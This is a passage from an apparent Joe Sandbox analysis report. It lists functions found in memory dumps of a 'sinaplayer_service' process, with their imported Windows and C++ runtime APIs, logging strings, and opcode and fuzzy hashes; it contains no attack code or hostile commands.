                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ?gptr@?$basic_streambuf@D@std@@@std@@U?$char_traits@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1832386714-0
                                                                                                                                                                                                    • Opcode ID: 8357150e8dc030518a2d70493fd5e4bc382718326bb9ced2311071b3f4921309
                                                                                                                                                                                                    • Instruction ID: 1f36ce54da44b4f7b400efc136353f47c347d11d38943535d2a72f1ac244c10d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8357150e8dc030518a2d70493fd5e4bc382718326bb9ced2311071b3f4921309
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4213D713002008FCF669F38D9D812877B9BB493617555AAAD846CB2A5CB79EC45CB40
                                                                                                                                                                                                    Function 00372CC0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 178networkCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • HttpQueryInfoW.WININET(?,00000016,00000000,?,00000000), ref: 00372D2F
                                                                                                                                                                                                      • Part of subcall function 00374790: memset.MSVCR120 ref: 003747B0
                                                                                                                                                                                                    • HttpQueryInfoW.WININET(?,00000016,?,00000000,00000000), ref: 00372D8F
                                                                                                                                                                                                    • ?SysWideToNativeMB@base@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@3@@Z.BASE(?,?,?,?), ref: 00372DC8
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,-00000002,000000FF,?,00000000,00000000), ref: 00372E1C
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,00000000,00000000), ref: 00372E76
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120(?,00000000,00000000), ref: 00372E9D
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00372EA6
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,00000000,00000000), ref: 00372ECC
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@$HttpInfoQueryU?$char_traits@$B@base@@D@2@@std@@D@std@@D@std@@@std@@NativeU?$char_traits@_Unlock@?$basic_streambuf@V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@2@@3@@W@std@@Widememset
                                                                                                                                                                                                    • String ID: `qml
                                                                                                                                                                                                    • API String ID: 2861592337-3674608353
                                                                                                                                                                                                    • Opcode ID: 906b7661e59610714bb86aac9d971f5e880c7e6ccf3f2dbecdb48de5f860a810
                                                                                                                                                                                                    • Instruction ID: 2e9815d0b0e5b68e3209bee242397df0e1a64d9ab0898392c2dce79b1d32eef9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 906b7661e59610714bb86aac9d971f5e880c7e6ccf3f2dbecdb48de5f860a810
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A616DB1900208ABDF26DFA4CC45BEEBBB8FF05314F544129E41ABB2D1DB796944CB61
                                                                                                                                                                                                    Function 00392650 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 164COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120(8285FFAB), ref: 0039268C
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 003926A2
                                                                                                                                                                                                    • ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP120 ref: 003926AE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?pptr@?$basic_streambuf@$Pninc@?$basic_streambuf@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2538508077-3916222277
                                                                                                                                                                                                    • Opcode ID: 3bf0ba47c18372c2afb80755dc954effea0dfdfbdaafbe59816a78304dab0e5b
                                                                                                                                                                                                    • Instruction ID: 5a19840af75520ed43f0b6559b7ee5e039be9235b95593d70524d5c1d8d3d668
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3bf0ba47c18372c2afb80755dc954effea0dfdfbdaafbe59816a78304dab0e5b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E51C931A04509EFCF16CFA4C885AEEB7B9FF09320F54452AE512B3691D731A954CBA1
                                                                                                                                                                                                    Function 003870C0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 118fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ReadFile.KERNEL32(FFFFFFFF,?,?,?,?,8285FFAB), ref: 0038710D
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0038711B
                                                                                                                                                                                                      • Part of subcall function 00386E90: ??4CallbackBase@internal@base@@QAEAAV012@ABV012@@Z.BASE(?,?,?,?,?,00387206,?,?), ref: 00386EA5
                                                                                                                                                                                                      • Part of subcall function 00386E90: ?AddRef@RefCountedThreadSafeBase@subtle@base@@IBEXXZ.BASE(?,00387206,?,?), ref: 00386EB5
                                                                                                                                                                                                      • Part of subcall function 00386E90: ?Release@RefCountedThreadSafeBase@subtle@base@@IBE_NXZ.BASE(?,00387206,?,?), ref: 00386ECA
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@subtle@base@@CountedSafeThread$Base@internal@base@@CallbackErrorFileLastReadRef@Release@V012@V012@@
                                                                                                                                                                                                    • String ID: ReadFile failed: $network_change\file_stream_context_win.cc$Vll
                                                                                                                                                                                                    • API String ID: 3731411578-499573692
                                                                                                                                                                                                    • Opcode ID: ef799d8728dc2e7018d779f8201ac7273dc5c27762f1f8ee26910d8ad3a7e129
                                                                                                                                                                                                    • Instruction ID: ead4c477761fd3bb320963543fde9b436b0b07132e7ac446bcb7f6b580b31ff8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef799d8728dc2e7018d779f8201ac7273dc5c27762f1f8ee26910d8ad3a7e129
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE417476A04608AFCF21DF94DC46BDEBBB9FB44720F10466BF915D3690D73699108B50
                                                                                                                                                                                                    Function 003874A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 105windowfileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,?,?,8285FFAB), ref: 003874E9
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 003874F7
                                                                                                                                                                                                    • ?GetMinLogLevel@logging@@YAHXZ.BASE ref: 00387536
                                                                                                                                                                                                    • ??0LogMessage@logging@@QAE@PBDHH@Z.BASE(network_change\file_stream_context_win.cc,00000089,00000001), ref: 00387553
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,000003E5), ref: 0038757E
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE(?,000003E5), ref: 00387596
                                                                                                                                                                                                      • Part of subcall function 00386E90: ??4CallbackBase@internal@base@@QAEAAV012@ABV012@@Z.BASE(?,?,?,?,?,00387206,?,?), ref: 00386EA5
                                                                                                                                                                                                      • Part of subcall function 00386E90: ?AddRef@RefCountedThreadSafeBase@subtle@base@@IBEXXZ.BASE(?,00387206,?,?), ref: 00386EB5
                                                                                                                                                                                                      • Part of subcall function 00386E90: ?Release@RefCountedThreadSafeBase@subtle@base@@IBE_NXZ.BASE(?,00387206,?,?), ref: 00386ECA
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@subtle@base@@CountedMessage@logging@@SafeThread$??6?$basic_ostream@Base@internal@base@@CallbackD@std@@@std@@ErrorFileLastLevel@logging@@Ref@Release@U?$char_traits@V012@V012@@V01@Write
                                                                                                                                                                                                    • String ID: WriteFile failed: $network_change\file_stream_context_win.cc$Vll
                                                                                                                                                                                                    • API String ID: 2368511088-239441431
                                                                                                                                                                                                    • Opcode ID: 794fd34cb74fbe43b44bdb9400e34f58b23da448d19f1806e3ea436b623babfb
                                                                                                                                                                                                    • Instruction ID: 6dc21e73758ae9559d379f23486b8f1a39a8437b6c096de1e4498d3cb9d4a6ae
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 794fd34cb74fbe43b44bdb9400e34f58b23da448d19f1806e3ea436b623babfb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C331C772A04208AFDB11DF94DD46FDEB7B9FB45720F10466AF815A3290D7369E14CBA0
                                                                                                                                                                                                    Function 6C57CDB0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • strlen.MSVCR120(00000000,00000000,?,6C57CD86), ref: 6C57CDCA
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,00000004,00000000,?,6C57CD86), ref: 6C57CDE0
                                                                                                                                                                                                    • strlen.MSVCR120(00000000,?,00000000,?,6C57CD86), ref: 6C57CE00
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,00000001,?,00000000,?,6C57CD86), ref: 6C57CE11
                                                                                                                                                                                                    • strcpy_s.MSVCR120(00000000,00000001,00000000,?,00000000,?,6C57CD86), ref: 6C57CE25
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,00000000,?,6C57CD86), ref: 6C57CE46
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _calloc_crtstrlen$freestrcpy_s
                                                                                                                                                                                                    • String ID: xL
                                                                                                                                                                                                    • API String ID: 1244768049-2859553101
                                                                                                                                                                                                    • Opcode ID: 053409fa8939731a32f6762a2c54b8deab0e4660e420c88674c0513a8bc0bfd4
                                                                                                                                                                                                    • Instruction ID: 1d9d70a834e46a6b24d40033dd3b7a2243a562d94a281f8d044714822b270c2b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 053409fa8939731a32f6762a2c54b8deab0e4660e420c88674c0513a8bc0bfd4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17213BB39063615EE7325A769C44B973BD4EB8237DF300A16D86093ED0EB75E88583E4
                                                                                                                                                                                                    Function 0038A2B0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP120(00000000,8285FFAB), ref: 0038A2DD
                                                                                                                                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP120 ref: 0038A2F8
                                                                                                                                                                                                    • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP120 ref: 0038A31E
                                                                                                                                                                                                    • ?_Getcat@?$codecvt@_WDH@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP120(?,?), ref: 0038A33F
                                                                                                                                                                                                    • ??0bad_cast@std@@QAE@PBD@Z.MSVCR120(bad cast), ref: 0038A355
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(003A5F18,003A5F18), ref: 0038A364
                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0038A37A
                                                                                                                                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP120 ref: 0038A385
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Lockit@std@@$??0_??0bad_cast@std@@??1_Bid@locale@std@@ExceptionFacet_Getcat@?$codecvt@_Getgloballocale@locale@std@@H@std@@Locimp@12@RegisterThrowV42@@Vfacet@locale@2@std::_
                                                                                                                                                                                                    • String ID: bad cast
                                                                                                                                                                                                    • API String ID: 1315793039-3145022300
                                                                                                                                                                                                    • Opcode ID: 11d809e503da8e8343513c92592c26ea72518ffee6e0b744ec6227eeec161b24
                                                                                                                                                                                                    • Instruction ID: c2d6873869f6f45a2c5a7c05cc0608854bb875a6607f6e6336a94aee547377bb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11d809e503da8e8343513c92592c26ea72518ffee6e0b744ec6227eeec161b24
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D131F236A00624DFDB12EFA4DC49AAEB7B8FF08720F454196E811A73A1C771AD00CBD1
                                                                                                                                                                                                    Function 00390BC0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP120(00000000,8285FFAB,00000000,?,00000000,?,?,00000000,0039B459,000000FF,?,003925DF), ref: 00390BED
                                                                                                                                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP120(?,?,00000000,0039B459), ref: 00390C08
                                                                                                                                                                                                    • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP120(?,?,00000000,0039B459), ref: 00390C2E
                                                                                                                                                                                                    • ?_Getcat@?$codecvt@DDH@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP120(?,0039B459,?,?,00000000,0039B459), ref: 00390C4F
                                                                                                                                                                                                    • ??0bad_cast@std@@QAE@PBD@Z.MSVCR120(bad cast,?,?,?,?,00000000,0039B459), ref: 00390C65
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(003A5F18,003A5F18), ref: 00390C74
                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00390C8A
                                                                                                                                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP120(?,?,00000000,0039B459), ref: 00390C95
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Lockit@std@@$??0_??0bad_cast@std@@??1_Bid@locale@std@@ExceptionFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@H@std@@Locimp@12@RegisterThrowV42@@Vfacet@locale@2@std::_
                                                                                                                                                                                                    • String ID: bad cast
                                                                                                                                                                                                    • API String ID: 834896558-3145022300
                                                                                                                                                                                                    • Opcode ID: cef875a91b28ab1567ada673bd9db1beecc5793af00b1de4dc010a908f3a6bc7
                                                                                                                                                                                                    • Instruction ID: 36d6769dee4ac7cc55e48efbc3f06c6f4430f8b2c5426e2e9766b2a196a4dd2b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cef875a91b28ab1567ada673bd9db1beecc5793af00b1de4dc010a908f3a6bc7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59319172A00224DFCF16DF68DD49AAAB7B8FB05720F454656E855AB3A1D731AD00CF90
                                                                                                                                                                                                    Function 003875E0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 80windowfileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000,8285FFAB), ref: 00387622
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00387630
                                                                                                                                                                                                    • ?GetMinLogLevel@logging@@YAHXZ.BASE ref: 00387644
                                                                                                                                                                                                    • ??0LogMessage@logging@@QAE@PBDHH@Z.BASE(network_change\file_stream_context_win.cc,00000097,00000001), ref: 00387661
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?), ref: 00387688
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE(?,?), ref: 003876A0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$?width@ios_base@std@@$?rdbuf@?$basic_ios@D@std@@@2@Message@logging@@V?$basic_streambuf@$??6?$basic_ostream@?setstate@?$basic_ios@_?uncaught_exception@std@@ErrorFileLastLevel@logging@@Osfx@?$basic_ostream@U?$char_traits@_V01@W@std@@@std@@Write
                                                                                                                                                                                                    • String ID: WriteFile failed: $network_change\file_stream_context_win.cc$Vll
                                                                                                                                                                                                    • API String ID: 2776686119-239441431
                                                                                                                                                                                                    • Opcode ID: 5c5dae8de53a26223a9f9202909d5bc4f65a48a549a96ff959767735f99ac7bf
                                                                                                                                                                                                    • Instruction ID: 1e40506264c5ae401dfea5afb4d511039605f0ae5641e17fa3aadd49d60d4d5c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c5dae8de53a26223a9f9202909d5bc4f65a48a549a96ff959767735f99ac7bf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8216272944608AFDB11DF94DD86BEEBBBDFB04750F10466AE815A2290E7369E048B60
                                                                                                                                                                                                    Function 00386D90 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 78windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileSizeEx.KERNEL32(?,?,8285FFAB), ref: 00386DC8
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00386DD6
                                                                                                                                                                                                    • ?GetMinLogLevel@logging@@YAHXZ.BASE ref: 00386DEA
                                                                                                                                                                                                    • ??0LogMessage@logging@@QAE@PBDHH@Z.BASE(network_change\file_stream_context_win.cc,0000004F,00000001), ref: 00386E04
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?), ref: 00386E2B
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE ref: 00386E43
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$?width@ios_base@std@@$?rdbuf@?$basic_ios@D@std@@@2@Message@logging@@V?$basic_streambuf@$??6?$basic_ostream@?setstate@?$basic_ios@_?uncaught_exception@std@@ErrorFileLastLevel@logging@@Osfx@?$basic_ostream@SizeU?$char_traits@_V01@W@std@@@std@@
                                                                                                                                                                                                    • String ID: GetFileSizeEx failed: $network_change\file_stream_context_win.cc$Vll
                                                                                                                                                                                                    • API String ID: 1284716602-1258412481
                                                                                                                                                                                                    • Opcode ID: 212ce1d042f7dc8117879231a7c224855de085e24b32c99cffd32d732b5277e9
